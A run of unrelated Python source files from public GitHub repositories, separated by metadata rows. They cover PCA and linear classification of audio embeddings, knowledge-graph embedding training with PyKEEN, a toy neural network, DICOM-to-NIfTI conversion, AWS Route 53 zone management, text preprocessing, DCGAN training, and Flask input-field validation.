# #f, axarr = plt.subplots(2, 3)
# # plt.figure(figsize=(10,8))
# # plt.tight_layout()
# # plt.title("PCA of the embeddings with variance thresholds")
# if dim == 2:
# ax = axs[i//3, i%3]
# ax.scatter(embed_transformed[:, 0], embed_transformed[:, 1], color=color)
# ax.set_title(f"Variance threshold={threshold}")
# # plot the embeddings 2D with label colors for the 50 classes
# #plt.subplot(2, 3, i+1)
# #plt.suptitle('Threshold = ' + str(thresholds[i]))
# #plt.scatter(embed_transformed[:, 0], embed_transformed[:, 1], color=color)
# #plt.xlabel('PC1')
# #plt.ylabel('PC2')
# # if i in [0, 1, 2]:
# # axarr[0, i].set_title('Threshold = ' + str(thresholds[i]))
# # axarr[0, i].scatter(embed_transformed[:, 0], embed_transformed[:, 1], color=color)
# # elif i in [3, 4, 5]:
# # axarr[1, i-3].set_title('Threshold = ' + str(thresholds[i]))
# # axarr[1, i-3].scatter(embed_transformed[:, 0], embed_transformed[:, 1], color=color)
# elif dim == 3:
# # plot the embeddings 3D with label colors for the 50 classes
# ax = fig.add_subplot(2, 3, i+1, projection='3d')
# ax.scatter(embed_transformed[:, 0], embed_transformed[:, 1], embed_transformed[:, 2], color=color)
# ax.set_title(f"Variance threshold={threshold}")
# #plt.subplot(1, 2, 1)
# # plt.title('PCA of the embeddings')
# # ax = plt.axes(projection='3d')
# # ax.scatter3D(embed_transformed[:, 0], embed_transformed[:, 1], embed_transformed[:, 2], color=color)
# # plt.xlabel('PC1')
# # plt.ylabel('PC2')
except:
return scores
# plt.tight_layout()
# plt.show()
return scores
def linear_clf_embeddings_pca(embeddings, labels):
"""Classify the embeddings using a linear classifier.
Args:
embeddings (str): Embeddings fitted by PCA
labels (str): Labels of the embeddings
Returns:
floats: Accuracies of the classifiers.
"""
embeds = embeddings
from sklearn.model_selection import train_test_split
train_embeds, test_embeds, train_labels, test_labels = train_test_split(embeds, labels, test_size=0.2, random_state=42)
from sklearn.linear_model import LogisticRegressionCV
super_train_labels = [int(label) // 100 for label in train_labels]
clfCV_super = LogisticRegressionCV(cv=5, random_state=0, max_iter=500).fit(train_embeds, super_train_labels)
clfCV_sub = LogisticRegressionCV(cv=5, random_state=0, max_iter=500).fit(train_embeds, train_labels)
super_test_labels = [int(label) // 100 for label in test_labels]
clfCVscore_super = clfCV_super.score(test_embeds, super_test_labels)
clfCVscore_sub = clfCV_sub.score(test_embeds, test_labels)
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
SVCclf_super = make_pipeline(StandardScaler(),
LinearSVC(random_state=0, tol=1e-5))
SVCclf_sub = make_pipeline(StandardScaler(),
LinearSVC(random_state=0, tol=1e-5))
SVCclf_super.fit(train_embeds, super_train_labels)
SVCclf_sub.fit(train_embeds, train_labels)
SVCscore_super = SVCclf_super.score(test_embeds, super_test_labels)
SVCscore_sub = SVCclf_sub.score(test_embeds, test_labels)
# return scores
return clfCVscore_super, SVCscore_super, clfCVscore_sub, SVCscore_sub
def linear_clf_embedding(embeddings, mode = "superclass"):
"""Function that takes the embeddings and trains a linear classifier on them.
This should be done in a way so that the classifier seperates different classes
based on their latent embedding.
Args:
embeddings (str): Embeddings fitted by PCA
mode (str): Classification labels to use. Must be either 'superclass' or 'subclass'.
Returns:
floats: Accuracies of the classifiers.
"""
# load the embeddings
load_embeds, labels = [], []
max_embed_len = max(np.unique([len(np.load(embedding)) for embedding in embeddings], return_counts=True)[0])
for embedding in embeddings:
embed = np.load(embedding, allow_pickle=True)
if mode == "superclass":
label = int(embedding.split('/')[-2][0])
elif mode == "subclass":
label = int(embedding.split('/')[-2][:3])
else:
print("Invalid classification mode. Must be either 'superclass' or 'subclass'.")
return
labels.append(label)
load_embeds.append(embed)
labels = np.array(labels)
embeds = np.array(load_embeds)
from sklearn.model_selection import train_test_split
train_embeds, test_embeds, train_labels, test_labels = train_test_split(embeds, labels, test_size=0.2, random_state=42)
from sklearn.linear_model import LogisticRegressionCV
clfCV = LogisticRegressionCV(cv=5, random_state=0).fit(train_embeds, train_labels)
clfCVscore = clfCV.score(test_embeds, test_labels)
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
SVCclf = make_pipeline(StandardScaler(),
LinearSVC(random_state=0, tol=1e-5))
SVCclf.fit(train_embeds, train_labels)
SVCscore = SVCclf.score(test_embeds, test_labels)
print(f"{mode} classification")
print(tabulate([['Logistic Regression CV', clfCVscore], ['SVC', SVCscore]],
headers=['Classifier', 'Accuracy'], tablefmt='latex'))
return clfCVscore, SVCscore
def plot_pca_scores(csv_path = 'output/embeddings/PCA_scores2.csv'):
"""Function should plot the different classifier scores for different thresholds.
Args:
csv_path (str, optional): Path to the csv file. Defaults to 'output/embeddings/PCA_scores_0_2.csv'.
"""
df = pd.read_csv(csv_path)
# plot the scores for all the thresholds
plt.figure(figsize=(10, 6))
plt.tight_layout()
plt.plot(df['threshold'], df['clfCV_super'], label='Logistic Regression CV (Super)', color='orange', linestyle='-')
plt.plot(df['threshold'], df['SVC_super'], label='SVC (Super)', color = 'indigo', linestyle='-')
plt.plot(df['threshold'], df['clfCV_sub'], label='Logistic Regression CV (Sub)', color='orange', linestyle='--')
plt.plot(df['threshold'], df['SVC_sub'], label='SVC (Sub)', color = 'indigo', linestyle='--')
plt.xlabel('Variance Threshold')
plt.ylabel('Classifier Accuracy')
plt.legend(title='Classification Algorithm')
plt.savefig('output/embeddings/PCA_scores2.png')
if __name__ == "__main__":
data_path = 'output/delta/embeddings/ECS50/'
embeddings = []
labels = []
# get all the embeddings
for folder in os.listdir(data_path):
if folder == '.DS_Store':
continue
embeddings.append([data_path + folder + '/' + file for file in os.listdir(data_path + folder) if file.endswith('.npy')])
labels.append([file.split('-')[0] for file in os.listdir(data_path + folder) if file.endswith('.npy')])
# flatten the lists
labels = [item for sublist in labels for item in sublist]
embeddings = [item for sublist in embeddings for item in sublist]
# dim = 64 to compare with VAE
dim = 64
scores = embeddingPCA_manual(embeddings, dim)
# save the scores to csv and plot the scores
scores.to_csv('output/embeddings/PCA_scores_1_1.csv')
plot_pca_scores('output/embeddings/PCA_scores_1_1.csv')
# do linear classification on the embeddings
linear_clf_embedding(embeddings, mode = "superclass")
linear_clf_embedding(embeddings, mode = "subclass") | magnusgp/LLAR | yamnet/PCA.py | PCA.py | py | 17,201 | python | en | code | 1 | github-code | 50 |
7285094270 | import pickle
import pykeen
from pykeen.datasets.base import PathDataset
import torch
from torch.optim import Adam
from pykeen.training import SLCWATrainingLoop,LCWATrainingLoop
from pykeen.evaluation import RankBasedEvaluator
import os
import numpy as np
from pykeen.models import ConvE,TransE,TransD,TransH,TransR,KG2E,RotatE,DistMult
import json
class KGEmbedding():
def __init__(self,model_name) -> None:
self.model_name=model_name
def construct_triples(self,
train_path="data/TrainingSet.txt",
valid_path="data/EvaluationSet.txt",
test_path="data/TestSet.txt",
create_inverse_triples=True):
"""Construct triples from the provided training, testing and validation sets.
Args:
train_path (str, optional): Path to training set file. Defaults to "data/TrainingSet.txt".
valid_path (str, optional): Path to validation set file. Defaults to "data/EvaluationSet.txt".
test_path (str, optional): Path to testing set file. Defaults to "data/TestSet.txt".
create_inverse_triples (bool, optional): Whether or not to create inverse triples. Defaults to True.
Returns:
tuple: Tuple containing training, validation and testing data.
"""
triple_factor_data = PathDataset(training_path=train_path,
testing_path=test_path,
validation_path=valid_path,
create_inverse_triples=create_inverse_triples)
triple_factor_data_train = triple_factor_data.training
triple_factor_data_test = triple_factor_data.testing
triple_factor_data_val = triple_factor_data.validation
return triple_factor_data_train, triple_factor_data_val, triple_factor_data_test, triple_factor_data
# 保存xx_to_id,id_to_xx文件
def save_id_mapping(self, dir_path="data"):
"""Save id mapping of the constructed triples in JSON format to the specified directory.
Args:
dir_path (str, optional): Directory to save the files. Defaults to "data".
Returns:
None
"""
_, _, _, triple_factor_data = self.construct_triples()
if not os.path.exists(os.path.join(dir_path, self.model_name)):
os.mkdir(os.path.join(dir_path, self.model_name))
with open(os.path.join(dir_path, self.model_name, "entity_to_id.json"), "w") as f:
json.dump(triple_factor_data.entity_to_id, f)
with open(os.path.join(dir_path, self.model_name, "id_to_entity.json"), "w") as f:
json.dump({i: j for j, i in triple_factor_data.entity_to_id.items()}, f)
with open(os.path.join(dir_path, self.model_name, "relation_to_id.json"), "w") as f:
json.dump(triple_factor_data.relation_to_id, f)
with open(os.path.join(dir_path, self.model_name, "id_to_relation.json"), "w") as f:
json.dump({i: j for j, i in triple_factor_data.relation_to_id.items()}, f)
# KGE训练
def Train_KGE(self,save_model=True):
if self.model_name=="ConvE":
KGE_model=ConvE
if self.model_name=="TransE":
KGE_model=TransE
if self.model_name=="TransD":
KGE_model=TransD
if self.model_name=="TransH":
KGE_model=TransH
if self.model_name=="TransR":
KGE_model=TransR
if self.model_name=="KG2E":
KGE_model=KG2E
if self.model_name=="RotatE":
KGE_model=RotatE
if self.model_name=="DistMult":
KGE_model=DistMult
triple_factor_data_train,triple_factor_data_vld,triple_factor_data_tst,triple_factor_data=self.construct_triples()
print(triple_factor_data.summarize())
self.model = KGE_model(
triples_factory=triple_factor_data_train,
entity_representations=[pykeen.nn.Embedding],
#entity_representations_kwargs=dict()
)
# Pick an optimizer from Torch
optimizer = Adam(params=self.model.get_grad_params())
# Pick a training approach (sLCWA or LCWA)
training_loop = SLCWATrainingLoop(
model=self.model,
triples_factory=triple_factor_data_train,
optimizer=optimizer,
)
# Train
_ = training_loop.train(
triples_factory=triple_factor_data_train,
num_epochs=100,
batch_size=256,
)
# print(self.model.entity_representations[0]._embeddings.weight.data[0])
# self.model.entity_representations[0]._embeddings.weight.data[0]=torch.tensor([0.]*50)
# print(self.model.entity_representations[0]._embeddings.weight.data[0])
# _ = training_loop.train(
# triples_factory=triple_factor_data_train,
# num_epochs=100,
# batch_size=256,
# )
print(self.model.entity_representations[0]._embeddings.weight.data[0])
if save_model:
if not os.path.exists("checkpoints/"):
os.mkdir("checkpoints")
torch.save(self.model,f"checkpoints/{self.model_name}.pkl")
return self.model
# KGE测试
def Evaluate_KGE(self,save_results=True):
triple_factor_data_train,triple_factor_data_vld,triple_factor_data_tst,triple_factor_data=self.construct_triples()
evaluator = RankBasedEvaluator()
# Get triples to test
mapped_triples = triple_factor_data_tst.mapped_triples
# Evaluate
results = evaluator.evaluate(
model=self.model,
mapped_triples=mapped_triples,
batch_size=1024,
additional_filter_triples=[
triple_factor_data_train.mapped_triples,
triple_factor_data_vld.mapped_triples,
],
)
print(results.data)
if save_results:
result_data_json = json.dumps({str(k): results.data[k] for k in results.data.keys()}, indent=4, ensure_ascii=False)
if not os.path.exists("results/"):
os.mkdir("results")
write_res_pth = f"results/{self.model_name}_results.json"
with open(write_res_pth, "w") as f:
f.write(result_data_json)
f.close()
return results
# 保存所有embedding
def save_all_embeddings(self):
if not os.path.exists("embeddings/"):
os.mkdir("embeddings")
np.save(f"embeddings/{self.model_name}_Entity_Embedding.npy",self.model.entity_representations[0]._embeddings.weight.data.numpy())
np.save(f"embeddings/{self.model_name}_Relation_Embedding.npy",self.model.relation_representations[0]._embeddings.weight.data.numpy())
# 保存所有HMDB化合物的embedding
def save_hmdb_embeddings(self):
with open(f"data/{self.model_name}/entity_to_id.json","r") as f:
entity_to_id=json.load(f)
with open(f"data/{self.model_name}/id_to_entity.json","r") as f:
id_to_entity=json.load(f)
HMDBs=[i for i in entity_to_id.keys() if "HMDB" in i]
HMDB_ids=[entity_to_id[i] for i in HMDBs]
entity_embeddings=np.load(f"embeddings/{self.model_name}_Entity_Embedding.npy")
HMDB_embedding_dict={}
for i in HMDB_ids:
HMDB_embedding_dict[id_to_entity[str(i)]]=entity_embeddings[i]
if not os.path.exists("results/"):
os.mkdir("results")
with open(f"results/{self.model_name}_HMDB_Embedding.pkl","wb") as f:
pickle.dump(HMDB_embedding_dict,f)
# 根据输入的类别保存embedding
def save_multiple_categories_embedding(self,categories):
with open(f"data/{self.model_name}/entity_to_id.json","r") as f:
entity_to_id=json.load(f)
with open(f"data/{self.model_name}/id_to_entity.json","r") as f:
id_to_entity=json.load(f)
with open(self.entity_path, newline='', encoding='utf-8') as f:
entity_list = f.readlines()
entity_list = [i.strip("\r\n").split("\t") for i in entity_list]
entities={}
for entity in entity_list:
if entity[1] in categories and entity[0] in entity_to_id.keys():
if entity[1] not in entities.keys():
entities[entity[1]] = [entity_to_id[entity[0]]]
else:
entities[entity[1]].append(entity_to_id[entity[0]])
entity_embeddings=np.load(f"embeddings/{self.model_name}_Entity_Embedding.npy")
entity_embeddings_dict={}
for category in entities.keys():
category_embedding={}
for entity_id in entities[category]:
category_embedding[id_to_entity[str(entity_id)]]=entity_embeddings[entity_id]
entity_embeddings_dict[category]=category_embedding
with open(f"results/{self.model_name}_{'_'.join(categories)}_Embedding.pkl","wb") as f:
pickle.dump(entity_embeddings_dict,f)
# KGE pipeline
def KGE_model_pipeline(self,eval_model=True,save_model=True,save_results=True,save_embeddings=True,save_HMDB_embedding=True,save_multiple_categories_embedding=None,save_id_mapping=True):
if save_id_mapping:
self.save_id_mapping(dir_path="data")
self.Train_KGE(save_model=save_model)
if save_embeddings:
self.save_all_embeddings()
if save_HMDB_embedding:
self.save_hmdb_embeddings()
if save_multiple_categories_embedding:
self.save_multiple_categories_embedding(categories=save_multiple_categories_embedding)
if eval_model:
self.Evaluate_KGE(save_results=save_results) | PKU-BDBA/HMKG-Progress | HMKG/hmkg/KGE/construct_triples.py | construct_triples.py | py | 10,121 | python | en | code | 1 | github-code | 50 |
8462259752 | import numpy as np
np.random.seed(0)
def create_data(points, classes):
X = np.zeros((points*classes, 2))
y = np.zeros(points*classes, dtype='uint8')
for class_number in range(classes):
ix = range(points*class_number, points*(class_number+1))
r = np.linspace(0.0, 1, points)
t = np.linspace(class_number*4, (class_number+1)*4, points) + np.random.randn(points)*0.2
X[ix] = np.c_[r*np.sin(t*2.5), r*np.cos(t*2.5)]
y[ix] = class_number
return X,y
import matplotlib.pyplot as plt
X, y = create_data(100, 3)
plt.scatter(X[:,0], X[:,1])
plt.show()
plt.scatter(X[:,0], X[:,1], c=y, cmap="brg")
plt.show()
class Layer_Dense:
def __init__(self, n_inputs, n_neurons):
self.weights = 0.10 * np.random.randn(n_inputs, n_neurons)
self.biases = np.zeros((1, n_neurons))
def forward(self, inputs):
self.output = np.dot(inputs, self.weights) + self.biases
class Activation_ReLU:
def forward(self, inputs):
self.output = np.maximum(0, inputs)
layer1 = Layer_Dense(4, 5)
layer2 = Layer_Dense(5, 2)
layer1.forward(X)
print(layer1.output)
layer2.forward(layer1.output)
print(layer2.output)
| CocolinoFan/Learning | NeuralNetwork/Neural_Networks_from_Scratch_P_5.py | Neural_Networks_from_Scratch_P_5.py | py | 1,184 | python | en | code | 0 | github-code | 50 |
33306271149 | """
Converter for dicom and nifti import.
Convert dicom to nifti.
Get the main modals using NiftiGetter, which is based on globbing.
Inherite NiftiGetter to use with specific converted raw nifti data.
"""
import os
import subprocess
import fnmatch
import logging
import pydicom
from mmdps import rootconfig
from mmdps.util import path, loadsave
from mmdps.dms import dicominfo
def gen_scan_info(infolder, outfolder):
"""
Generate scan_info.json file from dicom files.
Use one random dicom file.
"""
found = False
for dirpath, dirnames, filenames in os.walk(infolder):
if not found:
for filename in filenames:
try:
pydicom.read_file(os.path.join(dirpath, filename))
found = True
except:
pass
if found:
di = dicominfo.DicomInfo(os.path.join(dirpath, filename))
d = di.get_scan_info()
scanInfoFile = os.path.join(outfolder, 'scan_info.json')
loadsave.save_json_ordered(scanInfoFile, d)
def convert_dicom_to_nifti(infolder, outfolder):
"""
Convert DICOM to raw NIFTI.
The infolder should be the DICOM folder.
The outfolder will be the converted NIFTI folder.
the ret is the conversion program return value. 0 typically indicates success.
"""
path.rmtree(outfolder)
path.makedirs(outfolder)
gen_scan_info(infolder, outfolder)
ret = subprocess.call([rootconfig.path.dcm2nii, '-z', 'y', '-o', outfolder, infolder],
cwd=os.path.dirname(rootconfig.path.dcm2nii))
print(outfolder, ret)
return ret
class NiftiGetter:
"""Get specific modal from converted raw nii files."""
def __init__(self, niftifolder):
"""Init with the folder that contains nii files."""
self.niftifolder = niftifolder
self._files = os.listdir(self.niftifolder)
def fnmatch_all(self, pat):
"""Match all files that match the pattern."""
res = []
for file in self._files:
if fnmatch.fnmatch(file, pat):
res.append(os.path.join(self.niftifolder, file))
return res
def fnmatch_one(self, pat):
"""Match exactly one file with pattern."""
res = self.fnmatch_all(pat)
if len(res) == 1:
return res[0]
elif len(res) == 0:
logging.warning('No file match: {}: {}'.format(pat, self.niftifolder))
print('No file match:', pat)
return None
else:
logging.warning('More than one match: {} {}: {}'.format(pat, res, self.niftifolder))
print('More than one match:', pat, res)
return None
def get_T1(self):
"""Get T1 NIFTI file path."""
return self.fnmatch_one('*T1*.nii.gz')
def get_T2(self):
"""Get T2 NIFTI file path."""
return self.fnmatch_one('*T2*.nii.gz')
def get_BOLD(self):
"""Get BOLD NIFTI file path."""
return self.fnmatch_one('*BOLD*.nii.gz')
def get_DWI(self):
"""Get DWI NIFTI file, bval file and bvec file, in a tuple.
Validate with all(dwifiles) == True
"""
nii = self.fnmatch_one('*DWI*.nii.gz')
bval = self.fnmatch_one('*DWI*.bval')
bvec = self.fnmatch_one('*DWI*.bvec')
return (nii, bval, bvec)
def get_ScanInfo(self):
"""Get scan info dict."""
return os.path.join(self.niftifolder, 'scan_info.json')
class ChanggungNiftiGetter(NiftiGetter):
def __init__(self, niftifolder):
super().__init__(niftifolder)
def get_T1(self):
return self.fnmatch_one('*OSag_3D_T1BRAVO*.nii.gz')
def get_T2(self):
return self.fnmatch_one('*OAx_T2_PROPELLER*.nii.gz')
def get_BOLD(self):
return self.fnmatch_one('*BOLD-rest*.nii.gz')
def get_DWI(self):
nii = self.fnmatch_one('*DTI_24_Directions*.nii.gz')
bval = self.fnmatch_one('*DTI_24_Directions*.bval')
bvec = self.fnmatch_one('*DTI_24_Directions*.bvec')
dwifiles = (nii, bval, bvec)
if all(dwifiles):
return dwifiles
else:
return None
| geyunxiang/mmdps | mmdps/dms/converter.py | converter.py | py | 3,644 | python | en | code | 4 | github-code | 50 |
6597578574 | # -*- coding: utf-8 -*-
import uuid
"""
Classes for Route 53 domains.
James Reed jdreed1954@hotmail.com
Cell: 303-570-4927
Centennial Data Science
"""
class DomainManager:
"""Manage a Route 53 domain."""
def __init__(self, session):
"""Create DomainManager object."""
self.session = session
self.client = self.session.client('route53')
def get_hosted_zones(self):
"""Return the hosted zones."""
zones = []
paginator = self.client.get_paginator('list_hosted_zones')
for page in paginator.paginate():
for zone in page['HostedZones']:
zones.append(zone)
return zones
def list_hosted_zones(self):
""" Format list of All Hosted Zones"""
zones = self.get_hosted_zones()
print("\n\n ***************** All Hosted Zones ************************\n")
for zone in zones:
print("Zone: ", zone, "\n")
return
def get_public_hosted_zones(self):
"""Return the public hosted zones."""
public_zones = []
zones = self.get_hosted_zones()
for z in zones:
if z['Config']['PrivateZone'] == False:
public_zones.append(z)
return public_zones
def list_public_hosted_zones(self):
""" Format list of Public Hosted Zones"""
zones = self.get_public_hosted_zones()
#print("\n\n ***************** Public Hosted Zones ************************\n")
for zone in zones:
print(zone, "\n")
return
def get_a_records(self, zone):
"""Return list of A records from zone."""
a_recs = []
response = self.client.list_resource_record_sets(
HostedZoneId=zone['Id'],
StartRecordName=".",
StartRecordType='A',
StartRecordIdentifier=' '
)
# Filter this Nested Dictionary and Pull out all the A records
rrsSets = response['ResourceRecordSets']
for rrs in rrsSets:
print(rrs)
if (rrs['Type'] == 'A' and 'AliasTarget' in rrs):
recO = rrs['AliasTarget']
rec = [{'Name': rrs['Name'],
'HostedZoneId': recO['HostedZoneId'],
'DNSName': recO['DNSName'],
'EvaluateTargetHealth': recO['EvaluateTargetHealth']}]
a_recs.append(rec)
return a_recs
def find_hosted_zone(self, domain_name):
"""Find the hosted zone need."""
paginator = self.client.get_paginator('list_hosted_zones')
for page in paginator.paginate():
for zone in page['HostedZones']:
if domain_name.endswith(zone['Name'][:-1]):
return zone
return None
def create_hosted_zone(self, domain_name):
zone_name = '.'.join(domain_name.split('.')[-2:] + '.')
print(zone_name)
return self.client.create_hosted_zone(
Name=zone_name,
CallerReference=str(uuid.uuid4())
)
def create_arec_domain_record(self, zone, domain_name, endpoint):
"""Create record an A record for our resource."""
return self.client.change_resource_sets(
HostedZoneId=zone['Id'],
ChangeBatch={
'Comment': 'Created by Resource Automation.',
'Changes': [{
'Action': 'UPSERT',
'ResourceRecordSet': {
'Name': domain_name,
'Type': 'A',
'AliasTarget': {
'HostedZoneId': endpoint.zone,
'DNSName': endpoint.host,
'EvaluateTargetHealth': False
}
}
}]
}
)
| reed54/route53 | aState/domain.py | domain.py | py | 3,937 | python | en | code | 0 | github-code | 50 |
42201942444 | import numpy as np
import datetime
import itertools
import pickle
from collections import Counter
import re
"""
Code adapted from https://github.com/dennybritz/cnn-text-classification-tf
"""
def clean_str(string):
"""
Tokenization/string cleaning for input.
Originally taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
"""
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = tokenize(string)
return string.strip().lower()
def tokenize(string):
"""
Tokenize English strings
"""
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\(", " ( ", string)
string = re.sub(r"\)", " ) ", string)
string = re.sub(r"\?", " ? ", string)
string = re.sub(r"\s{2,}", " ", string)
return string
def normalize_sentence_length(sentences, padding_word='<PAD/>', max_length_words = None):
"""
Normalizes lengths to max_length. max_length = None, normalizes to max sentence length.
Pads shorter sentences using the padding_word.
Cuts longer sentences at max_length number of words.
sentences - list of sentence where each sentence is a list of words. eg. [['foo','bar'], ['fo2','bar2']]
"""
max_length_words = max_length_words if max_length_words is not None else max(len(x) for x in sentences)
norm_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = max_length_words - len(sentence)
padded_sentence = sentence + [padding_word] * num_padding
chopped_sentence = padded_sentence[:max_length_words]
norm_sentences.append(chopped_sentence)
return norm_sentences
def raw_text_to_sentence(text):
return clean_str(text).split(" ")
def build_vocab(sentences):
"""
Builds a vocabulary mapping from word to index based on the sentences.
Returns vocabulary mapping and inverse vocabulary mapping.
"""
print('building vocab...')
# Build vocabulary
word_counts = Counter(itertools.chain(*sentences))
# Mapping from index to word
vocabulary_inv = [x[0] for x in word_counts.most_common()]
# Mapping from word to index
vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}
return [vocabulary, vocabulary_inv]
def build_input_data(sentences, labels, vocabulary, vocab_inv):
"""
Maps sentences to vectors based on vocabulary.
Maps binary labels to 1 hot vectors, 0 -> [1,0], 1 -> [0,1]
returns np.arrays
"""
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences])
y = np.array([[0,1] if label else [1,0] for label in labels])
return x, y, vocabulary, vocab_inv
def read_pos_and_neg_data(header=True):
with open('./data/raw_input_neg_500k.tsv', 'rt') as f:
f.readline() if header else None
lines = f.readlines()
negatives = [(0, line.split('\t')[3]) for line in lines]
print('num of negative examples: {}'.format(len(negatives)))
with open('./data/raw_input_pos_500k.tsv', 'rt') as f:
f.readline() if header else None
lines = f.readlines()
positives = [(1, line) for line in lines]
print('num of positive examples: {}'.format(len(positives)))
return positives + negatives
def write_dev_train_sets(label_texts, path_template, p=0.1):
"""
Outputs a dev data set using apprx p percent of the list of label and text tuples label_texts
Rest goes to the training set
"""
print('saving dev and training data sets...')
# sample p% for dev use
label_texts = list(label_texts)
np.random.shuffle(label_texts)
dev_size = int(p * len(label_texts))
with open(path_template.format('dev'), 'wb') as df:
pickle.dump(label_texts[-dev_size:], df)
with open(path_template.format('train'), 'wb') as tf:
pickle.dump(label_texts[:-dev_size], tf)
def preprocess_raw_inputs_and_save():
labels, texts = zip(*read_pos_and_neg_data())
sentences = [raw_text_to_sentence(text) for text in texts]
normalized_sentences = normalize_sentence_length(sentences, max_length_words=68)
vocab, inv_vocab = build_vocab(normalized_sentences)
ts = datetime.datetime.now().strftime('%Y-%m-%d.%H%M%S')
path_template = './data/{{}}_set.pickle.{}'.format(ts)
with open('./data/vocab.pickle.{}'.format(ts), 'wb') as vocab_file:
pickle.dump((vocab, inv_vocab), vocab_file)
write_dev_train_sets(zip(labels, normalized_sentences), path_template, p=0.1)
def load_input_data(example_path, vocab_path):
with open(example_path, 'rb') as f:
labels, sentences = zip(*pickle.load(f))
with open(vocab_path, 'rb') as v:
vocabulary, inv_vocabulary = pickle.load(v)
return build_input_data(sentences, labels, vocabulary, inv_vocabulary)
def batch_iter(data, batch_size, num_epochs):
"""
Generates a batch iterator for a dataset.
"""
data = np.array(data)
data_size = len(data)
num_batches_per_epoch = int(len(data)/batch_size) + 1
for epoch in range(num_epochs):
# Shuffle the data at each epoch
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index]
| jimmec/tensorflow-demo | data_helper.py | data_helper.py | py | 5,772 | python | en | code | 2 | github-code | 50 |
12900342798 | #coding=utf-8
"""Train DCGAN"""
import glob
import numpy as np
from scipy import misc
import tensorflow as tf
from DCGAN import *
#Hyperparameter
EPOCH = 100
BATCH_SIZE = 128
LEARNING_RATE =0.0002
Beta_1 = 0.5
def train():
#获取训练数据
data = []
for image in glob.glob("image/*"):
image_data =misc.imread(image)#return image array
data.append(image_data)
input_data = np.array(data)
#将数据标准化成[-1,1],tanh的激活取值范围
input_data =(input_data.astype(np.float32)-127.5)/127.5
#构造生成器
g = generator_model()
d = discriminator_model()
#构建生成器和判别器组成的网络模型
d_on_g = generator_containing_discriminator(g,d)
#优化器用 adam optimizer
g_optimizer = tf.keras.optimizers.Adam(lr = learning_rate,beta_1=Beta_1)
d_optimizer = tf.keras.optimizers.Adam(lr = learning_rate,beta_1=Beta_1)
#配置生成器和判别器
g.compile(loss = "binary_crossentropy",optimizer=g_optimizer)
d.compile(loss = "binary_crossentropy",optimizer=d_optimizer)
d.trainable = True #设置标志位 根据此时是否能够训练,若不能训练则把判别器固定 优化生成器
d_on_g.compile(loss = "binary_crossentropy",optimizer=d_optimizer)# 先有一个生成器再经过一个判别器
#开始训练
for epoch in range(EPOCH):
for index in range(int(input_data.shape[0]/(BATCH_SIZE))):
#每经过一个区块的大小去训练一次
input_batch = ipnut_data[index*BATCH_SIZE:(index+1)*BATCH_SIZE]
#连续均匀分布的随机数据
random_data = np.random.uniform(-1,1,size=(BATCH_SIZE,100))
#生成器 生成的图片数据
generated_images = g.predict(random_data,verbose=0)
input_batch = np.concatenate((input_batch,generated_images))
output_batch = [1]*BATCH_SIZE+[0]*BATCH_SIZE
#训练判别器, 让他具备识别不合格生成图片的能力
d_loss = d.train_on_batch(input_batch,output_batch)
#当训练生成器时,让判别器不可被训练
d.trainable = False
#训练生成器,并通过不可被训练的判别器去判别
g_loss = d_on_g.train_on_batch(random_data,[1]*BATCH_SIZE)
#恢复判别器可被训练
d.trainable = True
#打印损失
print("Step %d Generator Loss: %f Discriminator Loss: %f"%(index,g_loss,d_loss))
if __name__ == "__main__":
train() | Jumponthemoon/DeepLearning_GAN | train.py | train.py | py | 2,567 | python | en | code | 0 | github-code | 50 |
1581667461 | # -*- coding: utf-8 -*-
from utils import fields
from utils import validate
from module.common import GetResource
from module.common import field_inputs_wrap as _field_inputs_wrap
from module.common import field_inputs_ref as _field_inputs_ref
from module.common import field_inputs as _field_inputs
from module.common import field_inputs_wrap_head
# for serialize
from .__init__ import __customer_business_head__ as __head__, \
__customer_business_heads__ as __heads__, \
__customer_business_detail_head__ as __head_detail__, \
__customer_business_detail_rates_head__ as __head_detail_rates__, \
__customer_business_detail_deals_head__ as __head_detail_deals__, \
__customer_business_detail_images_url_head__ as __head_detail_images_url__
field_inputs = _field_inputs.copy()
field_inputs_ref = _field_inputs_ref.copy()
field_inputs_wrap = _field_inputs_wrap.copy()
field_inputs['image_url'] = {
'type': fields.String(),
'required': True,
'validator': validate.str_range(argument={'low': 1, 'high': 255})
}
field_inputs['cat'] = {
'required': True,
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs['lat'] = {
'required': True,
#'validator': validate.Float(),
'validator': validate.str_range(argument={'low': 1, 'high': 255}),
'type': fields.Float()
}
field_inputs['long'] = field_inputs['lat'].copy()
field_inputs['deal'] = field_inputs['cat'].copy()
field_inputs_wrap['orderBy'] = {
'validator': validate.str_in_list(
default='name',
argument=['name', 'description'],
),
'type': fields.String(default='name'),
}
# TODO: use validate.float
field_inputs_detail = {}
field_inputs_detail_rates = {}
field_inputs_detail_deals = {}
field_inputs_detail_images_url = {}
field_inputs_detail['rate'] = {
#'validator': validate.str_range(argument={'low': 1, 'high': 255}),
#'type': fields.Float(default=0)
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs_detail_rates['id'] = {
'validator': validate.natural(),
'type': fields.Integer()
}
field_inputs_detail_rates['avatar_url'] = {
'validator': validate.str_range(argument={'low': 1, 'high': 255}),
'type': fields.String()
}
field_inputs_detail['deals'] = {
# type attribute for marshal
'type': { fields.List(fields.Nested({
'title': {'type': fields.String(attribute='title')},
'description': {'type': fields.String(attribute='description')},
}))
},
# validate attribute for reqparse
'validator': { fields.List(fields.Nested({
'title':{'type': validate.str_range(argument={'low': 1, 'high': 64})},
